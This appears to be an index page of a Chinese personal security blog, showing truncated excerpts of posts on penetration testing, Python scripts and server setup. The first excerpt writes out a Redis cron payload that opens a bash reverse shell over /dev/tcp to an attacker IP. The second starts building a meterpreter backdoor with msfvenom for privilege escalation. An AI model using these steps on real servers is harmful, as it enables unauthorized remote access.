Jove・筆記

1

Web安全与渗透 2018-05-29

Redis未授权访问反弹shell

1. redis-cli -h -p -a 2.一分钟反弹 set xxx "\n\n*/1 * * * * /bin/bash -i>&/dev/tcp/xxx.xxx.xxx.xxx/6666 0>&1\n\n" config set dir /var/spool/cr...

2

Web安全与渗透 2018-05-17

事因：偶遇护卫神，这php权限给弄的只有一点点了。N久没提权，手动扒扒，发现以前的提权方式都不行了。（这个方法目测还能坚持个一年半载的）直接开始： 1.msfvenom 生成个powsershell 反弹后门： msfvenom -p windows/x64/meterpr...

3

Python 2018-03-19

[codesyntax lang="python"]import requests import re import urllib3 urllib3.disable_warnings() i=0 file = open (r"./1.txt") for eachLine i...

4

HTML 2018-03-19

请输入密码访问

5

小折腾/小配置 2018-02-27

管理PostgreSQL用户和数据库1. 以管理员身份登录数据库 postgres 用户 root@attacker:~#sudo -u postgres psql //li连接外部数据库root@attacker:~# psql -U postgres -h ...

6

小折腾/小配置 2018-01-31

安装Jave81. 导入Webupd8 PPAsudo add-apt-repository ppa:webupd8team/java sudo apt-get update2. 安装sudo apt-get install oracle-java8-installe...

7

Python 2018-01-30

用来dump内存数据后，查找关键信息while true;do command;sleep 2;done[codesyntax lang="php"]# _*_coding:utf-8 _*_ import sys import re reload(sys...